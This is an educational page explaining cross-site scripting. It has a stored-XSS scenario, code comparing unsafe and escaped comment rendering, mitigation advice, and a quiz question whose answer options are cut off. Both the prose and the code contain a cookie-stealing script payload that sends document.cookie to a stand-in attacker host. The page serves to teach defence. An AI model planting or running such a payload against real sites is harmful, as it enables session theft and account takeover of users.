XSS injection (Cross-site scripting)
What is it?
XSS injection (Cross-site scripting) is a web security vulnerability where an attacker injects malicious client-side scripts (usually JavaScript) into a web page that other users' browsers will execute. It exploits unsafe handling of user input or insufficient output encoding/sanitization. Consequences include session theft, account takeover, content manipulation, and distribution of malware.
Practical example
Imagine a discussion board that renders user comments without sanitizing HTML. An attacker posts a comment containing <script>fetch('https://attacker.example/steal?c='+document.cookie)</script>. When other users view that thread, the script executes in their browsers and sends their session cookie to the attacker. This illustrates stored XSS; other types include reflected XSS (the payload is reflected back from a URL or request parameter) and DOM-based XSS (client-side script itself writes untrusted data into the DOM unsafely). Developers mitigate XSS using context-aware output encoding, robust sanitizers such as DOMPurify, Content Security Policy, and secure cookie settings (HttpOnly, SameSite).
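The comment-rendering step of the discussion board above, shown as an added example (not code from the original page): an unsafe string concatenation next to a version that applies context-aware output encoding. The function names, the stored comment and the check are all constructed for illustration.

```javascript
// Added example, not part of the original page. Demonstrates the stored-XSS
// rendering bug from the text and its fix via HTML-text-context encoding.

// Constructed stored comment carrying the payload quoted in the text.
const STORED_COMMENT = {
  author: "mallory",
  body: "<script>fetch('https://attacker.example/steal?c='+document.cookie)</script>",
};

// Encoder for the HTML *text* context only. Attribute, URL and JavaScript
// contexts each need their own encoder (that is what "context-aware" means).
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: user-controlled text is spliced straight into the markup,
// so a stored <script> tag becomes live code in every viewer's browser.
function renderCommentUnsafe(c) {
  return `<div class="comment"><b>${c.author}</b>: ${c.body}</div>`;
}

// Hardened: every user-controlled value is encoded for the context it lands in.
// The payload is displayed as literal text instead of being executed.
function renderCommentSafe(c) {
  return `<div class="comment"><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</div>`;
}

// Review/test helper: does an executable <script> tag survive rendering?
// (A real review would also check event-handler attributes, javascript: URLs, etc.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("unsafe:", renderCommentUnsafe(STORED_COMMENT));
console.log("safe:  ", renderCommentSafe(STORED_COMMENT));
console.log("script tag survives unsafe render:", containsScriptTag(renderCommentUnsafe(STORED_COMMENT)));
console.log("script tag survives safe render:  ", containsScriptTag(renderCommentSafe(STORED_COMMENT)));
```

Encoding is the defence against the rendering bug itself; a Content Security Policy and HttpOnly cookies limit the damage if an encoding step is ever missed.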
Test your knowledge
Which of the following is the most effective primary defense against stored XSS when rendering user-generated content on a page?